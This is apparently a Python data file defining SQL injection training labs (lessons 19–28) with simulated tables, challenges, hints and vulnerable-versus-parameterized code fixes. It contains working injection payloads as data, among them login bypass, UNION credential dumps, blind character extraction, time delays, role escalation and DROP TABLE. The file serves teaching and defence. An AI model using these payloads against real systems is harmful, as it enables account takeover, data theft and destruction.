# Labs for every SQL Injection lesson.
# Lesson 19 and 20 keep their rich custom templates (sql_lab.html, sql_lab_2.html).
# Lessons 21-28 use the generic data-driven lab template (lab.html).

USERS_TABLE = {
    "columns": ["id", "username", "password", "role"],
    "rows": [
        [1, "admin", "admin123", "admin"],
        [2, "alice", "wonderland", "staff"],
        [3, "bob", "builder", "staff"],
        [4, "carol", "carol123", "guest"],
    ],
}

PRODUCTS_TABLE = {
    "columns": ["id", "name", "price"],
    "rows": [
        [1, "Laptop", 45000],
        [2, "Mouse", 500],
        [3, "Keyboard", 1200],
        [4, "Monitor", 8000],
    ],
}

ACCOUNTS_TABLE = {
    "columns": ["id", "username", "password", "role"],
    "rows": [
        [1, "admin", "admin123", "admin"],
        [2, "alice", "wonderland", "staff"],
        [3, "bob", "builder", "staff"],
        [4, "carol", "carol123", "guest"],
    ],
}

ORDERS_TABLE = {
    "columns": ["id", "customer", "total"],
    "rows": [
        [1, "alice", 45000],
        [2, "bob", 1200],
        [3, "carol", 8000],
        [4, "admin", 500],
    ],
}

LABS = {
    19: {"template": "sql_lab.html", "title": "SQL Injection Practice Lab", "icon": "bi-bug-fill"},
    20: {"template": "sql_lab_2.html", "title": "Injection Points Lab", "icon": "bi-pin-angle-fill"},
    21: {
        "lesson_id": 21,
        "title": "Types of SQL Injection Lab",
        "icon": "bi-diagram-3",
        "description": "A vulnerable shop where you safely practice all four attack families: error-based, UNION, boolean blind, and time-based blind injection.",
        "objectives": [
            "Trigger an error and read what it leaks.",
            "Use UNION to steal the users table.",
            "Ask yes/no questions with boolean conditions.",
            "Use a time-based payload when the page shows nothing.",
            "Solve the Final Challenge by typing your own payload.",
        ],
        "tables": {"users": USERS_TABLE, "products": PRODUCTS_TABLE},
        "challenges": [
            {
                "title": "Error-Based Probe",
                "icon": "bi-bug",
                "mode": "where",
                "table": "products",
                "query_template": "SELECT * FROM products WHERE id = {input}",
                "input_label": "id value",
                "placeholder": "1 or 1'",
                "payloads": [{"label": "1", "value": "1"}, {"label": "1'", "value": "1'"}],
                "error_when": "'",
                "error_message": "SQLite error near 1': unterminated quoted string. The error message reveals that your input was inserted in a numeric position without quotes.",
                "success_patterns": ["'"],
                "success_message": "Error-based injection works! The page printed a database error that tells an attacker how the query is built.",
                "explain": "Error-based injection is the simplest in-band attack: break the query with a stray quote and the database error message leaks query structure.",
            },
            {
                "title": "UNION Data Theft",
                "icon": "bi-collection",
                "mode": "where",
                "table": "products",
                "query_template": "SELECT name, price FROM products WHERE id = {input}",
                "input_label": "id value",
                "placeholder": "1 UNION SELECT username, password FROM users --",
                "payloads": [
                    {"label": "Steal users", "value": "1 UNION SELECT username, password FROM users --"},
                    {"label": "Normal id", "value": "1"},
                ],
                "success_patterns": ["UNION", "FROM users"],
                "success_message": "UNION injection detected! You merged the users table into the shop page and read the passwords.",
                "explain": "UNION-based injection is in-band too: the stolen rows are printed right on the page because the column counts now match.",
            },
            {
                "title": "Boolean Blind Oracle",
                "icon": "bi-eye-slash",
                "mode": "where",
                "table": "products",
                "query_template": "SELECT * FROM products WHERE id = {input}",
                "input_label": "id value",
                "placeholder": "1 AND 1=1",
                "payloads": [{"label": "TRUE (1 AND 1=1)", "value": "1 AND 1=1"}, {"label": "FALSE (1 AND 1=2)", "value": "1 AND 1=2"}],
                "success_patterns": ["AND 1=1"],
                "success_message": "Boolean blind injection works! The page only differs by a yes/no answer, but every fact can be extracted this way.",
                "explain": "No data appears, but a true condition looks normal and a false one looks different. That difference is the attacker's yes/no oracle.",
            },
            {
                "title": "Time-Based Blind",
                "icon": "bi-hourglass-split",
                "mode": "pattern",
                "query_template": "SELECT * FROM products WHERE id = {input}",
                "input_label": "id value",
                "placeholder": "1; IF(1=1, SLEEP(5), 0)",
                "payloads": [{"label": "SLEEP(5)", "value": "1; IF(1=1, SLEEP(5), 0)"}, {"label": "WAITFOR", "value": "1; IF(1=1) WAITFOR DELAY '0:0:5' --"}],
                "success_patterns": ["SLEEP|WAITFOR"],
                "success_message": "Time-based blind injection detected! A slow response means true, a fast one means false - the page itself never changes.",
                "explain": "When the page never changes visually, attackers measure delays: SLEEP(5) makes a true condition hang for 5 seconds.",
            },
        ],
        "fix": {
            "vulnerable": "username = input()\nquery = \"SELECT * FROM users WHERE username = '\" + username + \"'\"\ncursor.execute(query)",
            "safe": "query = \"SELECT * FROM users WHERE username = ?\"\ncursor.execute(query, (username,))",
        },
        "final": {
            "title": "Final Challenge: Bypass the Login",
            "mode": "row",
            "table": "users",
            "query_template": "SELECT * FROM users WHERE username = '{input}' AND password = 'secret'",
            "placeholder": "type your payload...",
            "target": {"username": "admin"},
            "forbidden": ["admin"],
            "hints": [
                "The username is wrapped in single quotes. Break out of the string with a quote first.",
                "Add an OR condition that is always true, like OR '1'='1'.",
                "The password check comes right after your input - hide it with a -- comment.",
            ],
        },
    },
    22: {
        "lesson_id": 22,
        "title": "UNION-Based SQL Injection Lab",
        "icon": "bi-collection",
        "description": "Follow the real UNION exploitation chain: count columns, probe with NULLs, find a text column, then dump the users table.",
        "objectives": [
            "Count the columns of the original query with ORDER BY.",
            "Confirm the count with UNION SELECT NULLs.",
            "Find which column is shown on the page.",
            "Extract usernames and passwords with UNION SELECT.",
            "Solve the Final Challenge by typing your own payload.",
        ],
        "tables": {"users": USERS_TABLE, "products": PRODUCTS_TABLE},
        "challenges": [
            {
                "title": "Count the Columns",
                "icon": "bi-sort-numeric-down",
                "mode": "pattern",
                "query_template": "SELECT name, price FROM products WHERE id = {input}",
                "input_label": "id value",
                "placeholder": "1 ORDER BY 2",
                "payloads": [{"label": "ORDER BY 1", "value": "1 ORDER BY 1"}, {"label": "ORDER BY 2", "value": "1 ORDER BY 2"}, {"label": "ORDER BY 3", "value": "1 ORDER BY 3"}],
                "success_patterns": ["ORDER BY"],
                "success_message": "ORDER BY probes found the column count! Raising n until the query errors tells you how many columns the SELECT returns.",
                "explain": "Every ORDER BY n beyond the real column count throws an error, so attackers walk n up until the query breaks.",
            },
            {
                "title": "NULL Probes",
                "icon": "bi-asterisk",
                "mode": "where",
                "table": "products",
                "query_template": "SELECT name, price FROM products WHERE id = {input}",
                "input_label": "id value",
                "placeholder": "1 UNION SELECT NULL, NULL --",
                "payloads": [{"label": "2 NULLs", "value": "1 UNION SELECT NULL, NULL --"}, {"label": "3 NULLs", "value": "1 UNION SELECT NULL, NULL, NULL --"}],
                "success_patterns": ["UNION", "NULL"],
                "success_message": "The UNION with 2 NULLs succeeded, confirming the original query returns exactly 2 columns.",
                "explain": "NULL matches any data type, so UNION SELECT NULL, NULL -- succeeds only when the column count matches exactly.",
            },
            {
                "title": "Find a Text Column",
                "icon": "bi-fonts",
                "mode": "where",
                "table": "users",
                "query_template": "SELECT name, price FROM products WHERE id = {input}",
                "input_label": "id value",
                "placeholder": "1 UNION SELECT username, 'x' FROM users --",
                "payloads": [{"label": "username + 'x'", "value": "1 UNION SELECT username, 'x' FROM users --"}],
                "success_patterns": ["'x'"],
                "success_message": "You placed username in the first column and a literal in the second. Whatever the page prints is where your data will appear.",
                "explain": "Probing with a known literal like 'x' reveals which result column is rendered on the page.",
            },
            {
                "title": "Extract the Passwords",
                "icon": "bi-key",
                "mode": "where",
                "table": "users",
                "query_template": "SELECT name, price FROM products WHERE id = {input}",
                "input_label": "id value",
                "placeholder": "1 UNION SELECT username, password FROM users --",
                "payloads": [{"label": "Dump users", "value": "1 UNION SELECT username, password FROM users --"}],
                "success_patterns": ["UNION", "FROM users", "password"],
                "success_message": "You dumped the entire users table - usernames AND passwords - straight onto the shop page.",
                "explain": "With matching column counts and types, the UNION just appends rows from any table the attacker names.",
            },
        ],
        "fix": {
            "vulnerable": "id = request.args.get(\"id\")\nquery = \"SELECT name, price FROM products WHERE id = \" + id\ncursor.execute(query)",
            "safe": "id = request.args.get(\"id\")\nquery = \"SELECT name, price FROM products WHERE id = ?\"\ncursor.execute(query, (id,))",
        },
        "final": {
            "title": "Final Challenge: Steal the Full Users Table",
            "mode": "pattern",
            "table": "products",
            "query_template": "SELECT name, price FROM products WHERE id = {input}",
            "placeholder": "type your payload...",
            "success_patterns": ["UNION", "FROM users", "password"],
            "forbidden": [],
            "hints": [
                "You must use UNION SELECT to read the users table.",
                "The original query has 2 columns: name and price.",
                "Put username in the first column and password in the second, then comment out the rest.",
            ],
        },
    },
    23: {
        "lesson_id": 23,
        "title": "Blind SQL Injection Lab",
        "icon": "bi-eye-slash",
        "description": "No data and no errors ever appear. Extract the admin password one yes/no question at a time - the classic blind attack.",
        "objectives": [
            "Use boolean conditions as a true/false oracle.",
            "Probe characters with SUBSTRING and ASCII.",
            "Narrow the search with comparisons.",
            "Use SLEEP to detect conditions without any visible change.",
            "Solve the Final Challenge by typing your own payload.",
        ],
        "tables": {"users": USERS_TABLE, "products": PRODUCTS_TABLE},
        "challenges": [
            {
                "title": "The Boolean Oracle",
                "icon": "bi-toggle-on",
                "mode": "where",
                "table": "products",
                "query_template": "SELECT * FROM products WHERE id = {input}",
                "input_label": "id value",
                "placeholder": "1 AND 1=1",
                "payloads": [{"label": "TRUE", "value": "1 AND 1=1"}, {"label": "FALSE", "value": "1 AND 1=2"}],
                "success_patterns": ["AND 1=1"],
                "success_message": "1 AND 1=1 returns a product (looks normal) while 1 AND 1=2 returns nothing. That difference is your yes/no oracle.",
                "explain": "The page never prints data, but a true condition behaves normally and a false one does not - that single bit drives the whole attack.",
            },
            {
                "title": "Guess a Character",
                "icon": "bi-alphabet",
                "mode": "pattern",
                "query_template": "SELECT * FROM products WHERE id = {input}",
                "input_label": "id value",
                "placeholder": "1 AND ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1))=97",
                "payloads": [{"label": "Is it 'a'? (97)", "value": "1 AND ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1))=97"}],
                "success_patterns": ["SUBSTRING", "ASCII"],
                "success_message": "If the page behaves normally, the admin password's first character is 'a'. Every letter is confirmed with one true/false question.",
                "explain": "SUBSTRING picks one character and ASCII turns it into a number, so you can compare it against every letter until one answers true.",
            },
            {
                "title": "Narrow the Search",
                "icon": "bi-graph-down",
                "mode": "pattern",
                "query_template": "SELECT * FROM products WHERE id = {input}",
                "input_label": "id value",
                "placeholder": "1 AND ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1)) > 100",
                "payloads": [{"label": "Greater than 100?", "value": "1 AND ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1)) > 100"}, {"label": "Greater than 110?", "value": "1 AND ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1)) > 110"}],
                "success_patterns": ["SUBSTRING", "> 100"],
                "success_message": "Binary search! Instead of trying 26 letters, a few > comparisons zoom in on the exact character.",
                "explain": "By asking 'is it greater than X?' the attacker halves the alphabet with every question, finding each character in about 5 tries.",
            },
            {
                "title": "Time-Based Detection",
                "icon": "bi-hourglass-bottom",
                "mode": "pattern",
                "query_template": "SELECT * FROM products WHERE id = {input}",
                "input_label": "id value",
                "placeholder": "1; IF(1=1, SLEEP(5), 0)",
                "payloads": [{"label": "IF(1=1, SLEEP(5), 0)", "value": "1; IF(1=1, SLEEP(5), 0)"}],
                "success_patterns": ["SLEEP"],
                "success_message": "Time-based blind injection! The condition is true, so the database sleeps 5 seconds - and a slow page is the answer YES.",
                "explain": "When the page NEVER changes visibly, SLEEP turns a boolean question into a measurable delay.",
            },
        ],
        "fix": {
            "vulnerable": "query = \"SELECT * FROM products WHERE id = \" + id_param\ncursor.execute(query)",
            "safe": "query = \"SELECT * FROM products WHERE id = ?\"\ncursor.execute(query, (id_param,))",
        },
        "final": {
            "title": "Final Challenge: Find the Password Length",
            "mode": "pattern",
            "table": "products",
            "query_template": "SELECT * FROM products WHERE id = {input}",
            "placeholder": "type your payload...",
            "success_patterns": ["SUBSTRING", "LENGTH"],
            "forbidden": [],
            "hints": [
                "You need the length of the admin password: use the LENGTH() function.",
                "Wrap a subquery that selects the password: (SELECT password FROM users WHERE username='admin').",
                "Compare it to a number: ... = 8, and a true answer looks normal.",
            ],
        },
    },
    24: {
        "lesson_id": 24,
        "title": "Real-World Queries Lab",
        "icon": "bi-database",
        "description": "SQL injection is not just SELECT. Attack UPDATE, INSERT, DELETE, and a stored second-order payload on a simulated online shop.",
        "objectives": [
            "Hijack an UPDATE and change roles.",
            "Sneak extra values through an INSERT.",
            "Wipe rows through a DELETE.",
            "Exploit a second-order stored payload.",
            "Solve the Final Challenge by typing your own payload.",
        ],
        "tables": {"users": USERS_TABLE, "orders": ORDERS_TABLE},
        "challenges": [
            {
                "title": "UPDATE Hijack",
                "icon": "bi-pencil-square",
                "mode": "pattern",
                "query_template": "UPDATE users SET password = '{input}' WHERE username = 'admin'",
                "input_label": "new password",
                "placeholder": "x', role='admin' WHERE '1'='1' --",
                "payloads": [{"label": "Escalate everyone", "value": "x', role='admin' WHERE '1'='1' --"}, {"label": "Normal value", "value": "newpass123"}],
                "success_patterns": ["role", "'1'='1'"],
                "success_message": "The payload closed the string, added a role='admin' assignment, and made the WHERE clause true for every row. Everyone is admin now.",
                "explain": "UPDATE injection rewrites the SET clause too: extra assignments get appended once the attacker closes the quoted string.",
            },
            {
                "title": "INSERT Smuggling",
                "icon": "bi-box-seam",
                "mode": "pattern",
                "query_template": "INSERT INTO users (username, password, role) VALUES ('{input}')",
                "input_label": "new user data",
                "placeholder": "x', 'owned', 'admin')--",
                "payloads": [{"label": "Add an admin", "value": "x', 'owned', 'admin')--"}, {"label": "Normal username", "value": "dave"}],
                "success_patterns": ["admin", ")"],
                "success_message": "You closed the VALUES list and added your own row with role='admin'. The attacker just created an admin account.",
                "explain": "INSERT injection breaks out of the VALUES tuple and appends extra columns or entirely new rows.",
            },
            {
                "title": "DELETE Destruction",
                "icon": "bi-trash",
                "mode": "pattern",
                "query_template": "DELETE FROM orders WHERE id = {input}",
                "input_label": "order id",
                "placeholder": "1 OR 1=1 --",
                "payloads": [{"label": "Delete everything", "value": "1 OR 1=1 --"}, {"label": "Delete one", "value": "1"}],
                "success_patterns": ["DELETE", "OR 1=1"],
                "success_message": "WHERE id = 1 OR 1=1 -- is true for every row - the DELETE removed the whole orders table.",
                "explain": "An always-true condition turns a single-row DELETE into a full wipe. Parameterization prevents this in one line.",
            },
            {
                "title": "Second-Order Attack",
                "icon": "bi-arrow-repeat",
                "mode": "pattern",
                "query_template": "SELECT * FROM users WHERE username = '{input}'",
                "input_label": "stored username",
                "placeholder": "admin'--",
                "payloads": [{"label": "Stored payload", "value": "admin'--"}, {"label": "Normal name", "value": "alice"}],
                "success_patterns": ["--"],
                "success_message": "The username admin'-- was stored during registration. When a later query pastes it back into SQL, the stored quote breaks out - second-order injection!",
                "explain": "Second-order injection stores the payload as innocent data first; a different query later concatenates it into SQL and it finally fires.",
            },
        ],
        "fix": {
            "vulnerable": "query = \"UPDATE users SET password = '\" + new_pass + \"' WHERE username = 'admin'\"",
            "safe": "query = \"UPDATE users SET password = ? WHERE username = ?\"\ncursor.execute(query, (new_pass, \"admin\"))",
        },
        "final": {
            "title": "Final Challenge: Stack a Destroyer",
            "mode": "pattern",
            "table": "orders",
            "query_template": "SELECT * FROM orders WHERE id = {input}",
            "placeholder": "type your payload...",
            "success_patterns": ["DROP", "users"],
            "forbidden": [],
            "hints": [
                "Stacked queries add a second statement after a semicolon.",
                "The second statement should drop the users table.",
                "Remember to comment out the rest of the original query: ... ; DROP TABLE users --",
            ],
        },
    },
    25: {
        "lesson_id": 25,
        "title": "Parameterized Queries Lab",
        "icon": "bi-shield-check",
        "description": "Watch the exact same payload succeed against string concatenation and fail completely against a parameterized query.",
        "objectives": [
            "Confirm the payload bypasses a vulnerable login.",
            "Turn on safe mode and watch the same payload die.",
            "See the parameterized query treat input as plain data.",
            "Solve the Final Challenge by typing your own payload.",
        ],
        "tables": {"users": USERS_TABLE},
        "challenges": [
            {
                "title": "The Vulnerable Login (concatenation)",
                "icon": "bi-exclamation-octagon",
                "mode": "where",
                "table": "users",
                "query_template": "SELECT * FROM users WHERE username = '{input}'",
                "input_label": "username",
                "placeholder": "' OR '1'='1' --",
                "payloads": [{"label": "' OR '1'='1' --", "value": "' OR '1'='1' --"}, {"label": "admin'--", "value": "admin'--"}],
                "success_patterns": ["OR '1'='1'"],
                "success_message": "Vulnerable! The payload became part of the SQL and logged you in without a password. This is exactly how the big breaches started.",
                "explain": "With string concatenation the input is merged into the SQL text, so quotes and keywords change the meaning of the query.",
            },
            {
                "title": "Now Turn On Safe Mode",
                "icon": "bi-shield-check",
                "mode": "where",
                "table": "users",
                "query_template": "SELECT * FROM users WHERE username = '{input}'",
                "input_label": "username",
                "placeholder": "' OR '1'='1' --",
                "payloads": [{"label": "' OR '1'='1' --", "value": "' OR '1'='1' --"}, {"label": "admin", "value": "admin"}],
                "requires_safe": True,
                "success_patterns": ["OR '1'='1'"],
                "success_message": "Defeated! In safe mode the payload is passed as a single data value to the ? placeholder - it can never close a string.",
                "explain": "Flip the Safe mode switch below and run the payload again. The query becomes parameterized and the whole payload becomes an ordinary string.",
            },
        ],
        "fix": {
            "vulnerable": "query = \"SELECT * FROM users WHERE username = '\" + username + \"' AND password = '\" + password + \"'\"\ncursor.execute(query)",
            "safe": "query = \"SELECT * FROM users WHERE username = ? AND password = ?\"\ncursor.execute(query, (username, password))",
        },
        "final": {
            "title": "Final Challenge: Break the Parameterized Query",
            "mode": "neutralize",
            "table": "users",
            "query_template": "SELECT * FROM users WHERE username = '{input}'",
            "placeholder": "type your payload...",
            "requires_safe": True,
            "forbidden": [],
            "hints": [
                "Safe mode must be ON - the whole point is the query is now parameterized.",
                "Type the payload that worked before: ' OR '1'='1' --",
                "Watch it get bound as a value and fail. That is parameterization doing its job.",
            ],
        },
    },
    26: {
        "lesson_id": 26,
        "title": "Defense in Depth Lab",
        "icon": "bi-shield-lock",
        "description": "Each layer of a layered defense blocks a different stage of the attack: validation, parameterization, least privilege, and controlled errors.",
        "objectives": [
            "Watch input validation reject a payload before SQL.",
            "Watch parameterization neutralize the same payload.",
            "Watch least privilege block DROP statements.",
            "Watch error handling hide database details.",
            "Solve the Final Challenge by typing your own payload.",
        ],
        "tables": {"users": USERS_TABLE, "orders": ORDERS_TABLE},
        "challenges": [
            {
                "title": "Layer 1: Input Validation",
                "icon": "bi-shield-exclamation",
                "mode": "reject",
                "query_template": "SELECT * FROM users WHERE username = '{input}'",
                "input_label": "username",
                "placeholder": "alice or ' OR '1'='1' --",
                "payloads": [{"label": "Payload attempt", "value": "' OR '1'='1' --"}, {"label": "Clean name", "value": "alice"}],
                "reject_pattern": "['\" ;=<>]",
                "reject_message": "Validation rejected the input: only letters, numbers, and underscores are allowed. The payload never reached the query.",
                "success_patterns": ["OR '1'='1'"],
                "success_message": "Layer 1 held! The whitelist blocked the payload characters before any SQL ran. But never rely on validation alone.",
                "explain": "Input validation is a first layer, not the whole defense - determined attackers find bypasses, so it is only one of several nets.",
            },
            {
                "title": "Layer 2: Parameterization",
                "icon": "bi-shield-check",
                "mode": "where",
                "table": "users",
                "query_template": "SELECT * FROM users WHERE username = '{input}'",
                "input_label": "username",
                "placeholder": "' OR '1'='1' --",
                "payloads": [{"label": "Payload attempt", "value": "' OR '1'='1' --"}],
                "requires_safe": True,
                "success_patterns": ["OR '1'='1'"],
                "success_message": "Layer 2 held! The parameterized query treated the payload as data - access denied.",
                "explain": "Parameterization is the strongest layer: the payload physically cannot become SQL code because the statement is parsed with placeholders first.",
            },
            {
                "title": "Layer 3: Least Privilege",
                "icon": "bi-person-lock",
                "mode": "pattern",
                "query_template": "SELECT * FROM orders WHERE id = {input}",
                "input_label": "id value",
                "placeholder": "1; DROP TABLE users --",
                "payloads": [{"label": "DROP attempt", "value": "1; DROP TABLE users --"}],
                "success_patterns": ["DROP"],
                "success_message": "Layer 3 held! The app's database account has no DROP privilege - permission denied. Even a successful injection cannot destroy tables.",
                "explain": "The application connects with a limited account that can only run the queries it needs, so a leak does not hand over the whole database.",
            },
            {
                "title": "Layer 4: Error Control",
                "icon": "bi-emoji-neutral",
                "mode": "where",
                "table": "orders",
                "query_template": "SELECT * FROM orders WHERE id = {input}",
                "input_label": "id value",
                "placeholder": "1'",
                "payloads": [{"label": "Break the query", "value": "1'"}, {"label": "Normal id", "value": "1"}],
                "error_when": "'",
                "error_message": "Something went wrong - please try again later. (The real DB error was logged server-side, never shown to the attacker.)",
                "success_patterns": ["'"],
                "success_message": "Layer 4 held! The page shows a generic message while the detailed error stays in the server log. The attacker learned nothing.",
                "explain": "Custom error pages stop error-based injection from leaking table names, column counts, and query structure.",
            },
        ],
        "fix": {
            "vulnerable": "# Only one layer - and it is string concatenation\nquery = \"SELECT * FROM users WHERE username = '\" + username + \"'\"",
            "safe": "# Layered: validate, parameterize, least privilege, hide errors\nif not re.fullmatch(r\"[A-Za-z0-9_]+\", username): reject()\nquery = \"SELECT * FROM users WHERE username = ?\"\ncursor.execute(query, (username,))",
        },
        "final": {
            "title": "Final Challenge: Get Past Every Layer",
            "mode": "neutralize",
            "table": "users",
            "query_template": "SELECT * FROM users WHERE username = '{input}'",
            "placeholder": "type your payload...",
            "requires_safe": True,
            "forbidden": [],
            "hints": [
                "Every layer is now active. Try the classic bypass: ' OR '1'='1' --",
                "With safe mode ON, the payload is bound as a value and cannot change the SQL.",
                "A strong layered defense turns the attack into a harmless string - that is the objective.",
            ],
        },
    },
    27: {
        "lesson_id": 27,
        "title": "SQL Injection Testing Lab",
        "icon": "bi-search",
        "description": "A safe, isolated test bed. Run the exact manual probes pentesters use to confirm an injection point before exploiting it.",
        "objectives": [
            "Probe with a single quote and read the error.",
            "Compare boolean conditions to find blind injection.",
            "Test the -- comment behavior.",
            "Probe for UNION column counting.",
            "Solve the Final Challenge by typing your own payload.",
        ],
        "tables": {"users": USERS_TABLE, "products": PRODUCTS_TABLE},
        "challenges": [
            {
                "title": "Probe 1: Single Quote",
                "icon": "bi-1-square",
                "mode": "where",
                "table": "products",
                "query_template": "SELECT * FROM products WHERE id = {input}",
                "input_label": "id value",
                "placeholder": "1'",
                "payloads": [{"label": "1'", "value": "1'"}, {"label": "Normal", "value": "1"}],
                "error_when": "'",
                "error_message": "SQL syntax error near '1''. The app printed a DB error - a strong sign the input reaches SQL unescaped.",
                "success_patterns": ["'"],
                "success_message": "Probe 1 positive! A single quote broke the query and the error was exposed. Mark this parameter as injectable.",
                "explain": "The single-quote probe is the first step of every manual SQL injection test - an error means the input touches the query.",
            },
            {
                "title": "Probe 2: Boolean Comparison",
                "icon": "bi-2-square",
                "mode": "where",
                "table": "products",
                "query_template": "SELECT * FROM products WHERE id = {input}",
                "input_label": "id value",
                "placeholder": "1 AND 1=1",
                "payloads": [{"label": "1 AND 1=1", "value": "1 AND 1=1"}, {"label": "1 AND 1=2", "value": "1 AND 1=2"}],
                "success_patterns": ["AND 1=1"],
                "success_message": "Probe 2 positive! 1 AND 1=1 returns rows while 1 AND 1=2 does not - the parameter reacts to injected logic.",
                "explain": "If true and false conditions produce different results, you have boolean-based injection - even when no error or data appears.",
            },
            {
                "title": "Probe 3: Comment Test",
                "icon": "bi-3-square",
                "mode": "pattern",
                "query_template": "SELECT * FROM products WHERE id = {input}",
                "input_label": "id value",
                "placeholder": "1--",
                "payloads": [{"label": "1--", "value": "1--"}, {"label": "2--", "value": "2--"}],
                "success_patterns": ["--"],
                "success_message": "Probe 3 positive! The -- comment silenced whatever followed, and the query still worked - your input controls the SQL ending.",
                "explain": "A trailing comment that leaves a valid query proves you can modify the statement and hide the parts you cannot see.",
            },
            {
                "title": "Probe 4: UNION Column Count",
                "icon": "bi-4-square",
                "mode": "pattern",
                "query_template": "SELECT * FROM products WHERE id = {input}",
                "input_label": "id value",
                "placeholder": "1 ORDER BY 3 --",
                "payloads": [{"label": "ORDER BY 3", "value": "1 ORDER BY 3 --"}, {"label": "ORDER BY 2", "value": "1 ORDER BY 2 --"}],
                "success_patterns": ["ORDER BY"],
                "success_message": "Probe 4 positive! ORDER BY probing reveals the column count, preparing a UNION data-extraction payload.",
                "explain": "Once you know the column count, a UNION SELECT with matching columns can read any table. Test thoroughly on a copy of the DB!",
            },
        ],
        "fix": {
            "vulnerable": "# What the tester is looking for in code review:\nid_param = request.args.get(\"id\")\nquery = \"SELECT * FROM products WHERE id = \" + id_param",
            "safe": "# The code review should demand this:\nquery = \"SELECT * FROM products WHERE id = ?\"\ncursor.execute(query, (id_param,))",
        },
        "final": {
            "title": "Final Challenge: Confirm the Injection",
            "mode": "pattern",
            "table": "products",
            "query_template": "SELECT * FROM products WHERE id = {input}",
            "placeholder": "type your payload...",
            "success_patterns": ["ORDER BY"],
            "forbidden": [],
            "hints": [
                "The final confirmation is proving you control the column count.",
                "Append ORDER BY with a number and a comment.",
                "Try: 1 ORDER BY 2 -- for a valid result, and 1 ORDER BY 50 -- for an error.",
            ],
        },
    },
    28: {
        "lesson_id": 28,
        "title": "Real-World Breach Lab",
        "icon": "bi-exclamation-triangle",
        "description": "Replay the techniques behind the famous breaches - Heartland, TalkTalk, and Sony - inside a safe simulation, then fix the app.",
        "objectives": [
            "Bypass a login exactly like the 2008 Heartland breach.",
            "Dump accounts the way attackers hit TalkTalk.",
            "Pull millions of accounts like the 2016 leaks.",
            "Destroy tables like the 2011 Sony attack.",
            "Solve the Final Challenge by hardening the login.",
        ],
        "tables": {"accounts": ACCOUNTS_TABLE, "products": PRODUCTS_TABLE},
        "challenges": [
            {
                "title": "2008: The Login Bypass (Heartland)",
                "icon": "bi-person-badge",
                "mode": "where",
                "table": "accounts",
                "query_template": "SELECT * FROM accounts WHERE username = '{input}'",
                "input_label": "username",
                "placeholder": "' OR '1'='1' --",
                "payloads": [{"label": "Bypass login", "value": "' OR '1'='1' --"}],
                "success_patterns": ["OR '1'='1'"],
                "success_message": "Same technique that breached Heartland in 2008: one always-true OR and a comment hid the password check, exposing 130 million card records.",
                "explain": "This login form concatenated input into SQL. A single form like this was the entry point for one of the largest breaches ever.",
            },
            {
                "title": "2015: Dump the Accounts (TalkTalk)",
                "icon": "bi-collection",
                "mode": "where",
                "table": "accounts",
                "query_template": "SELECT name, price FROM products WHERE id = {input}",
                "input_label": "id value",
                "placeholder": "1 UNION SELECT username, password FROM accounts --",
                "payloads": [{"label": "Dump accounts", "value": "1 UNION SELECT username, password FROM accounts --"}],
                "success_patterns": ["UNION", "FROM accounts"],
                "success_message": "A UNION-based dump pulled account data - exactly how attackers harvested 150,000+ customer records from TalkTalk in 2015.",
                "explain": "When the page prints query results, UNION lets an attacker read any table. TalkTalk's website had exactly this flaw.",
            },
            {
                "title": "2016: The Massive Account Dump",
                "icon": "bi-inboxes",
                "mode": "where",
                "table": "accounts",
                "query_template": "SELECT name, price FROM products WHERE id = {input}",
                "input_label": "id value",
                "placeholder": "1 UNION SELECT username, password FROM accounts --",
                "payloads": [{"label": "Full dump", "value": "1 UNION SELECT username, password FROM accounts --"}],
                "success_patterns": ["UNION", "FROM accounts"],
                "success_message": "Hundreds of millions of accounts were exposed in the 2016 breaches using this exact UNION dump - often with weak, unhashed passwords.",
                "explain": "The damage explodes when passwords are stored in plain text. Dump + no hashing = instant mass account theft.",
            },
            {
                "title": "2011: The Destroyer (Sony)",
                "icon": "bi-trash",
                "mode": "pattern",
                "query_template": "SELECT * FROM products WHERE id = {input}",
                "input_label": "id value",
                "placeholder": "1; DROP TABLE accounts --",
                "payloads": [{"label": "DROP attempt", "value": "1; DROP TABLE accounts --"}],
                "success_patterns": ["DROP", "accounts"],
                "success_message": "Stacked queries let the attacker run DROP TABLE and delete entire databases - the technique seen in the 2011 Sony attacks.",
                "explain": "Some drivers run stacked statements after a semicolon. Combined with a database account that could DROP, the attack was total.",
            },
        ],
        "fix": {
            "vulnerable": "# The 2008-2016 pattern\nquery = \"SELECT * FROM accounts WHERE username = '\" + user + \"'\"\ncursor.execute(query)",
            "safe": "# What those breaches taught us\nquery = \"SELECT * FROM accounts WHERE username = ? AND password_hash = ?\"\ncursor.execute(query, (user, hash_password(pw)))\n# plus: hashed passwords, least privilege, patched servers, audits",
        },
        "final": {
            "title": "Final Challenge: Secure the Login",
            "mode": "neutralize",
            "table": "accounts",
            "query_template": "SELECT * FROM accounts WHERE username = '{input}'",
            "placeholder": "type your payload...",
            "requires_safe": True,
            "forbidden": [],
            "hints": [
                "The app is now fixed: parameterized queries, hashed passwords, least privilege.",
                "Try the 2008 payload: ' OR '1'='1' --",
                "It becomes a harmless data value and access is denied - that is the lesson every breach teaches.",
            ],
        },
    },
}
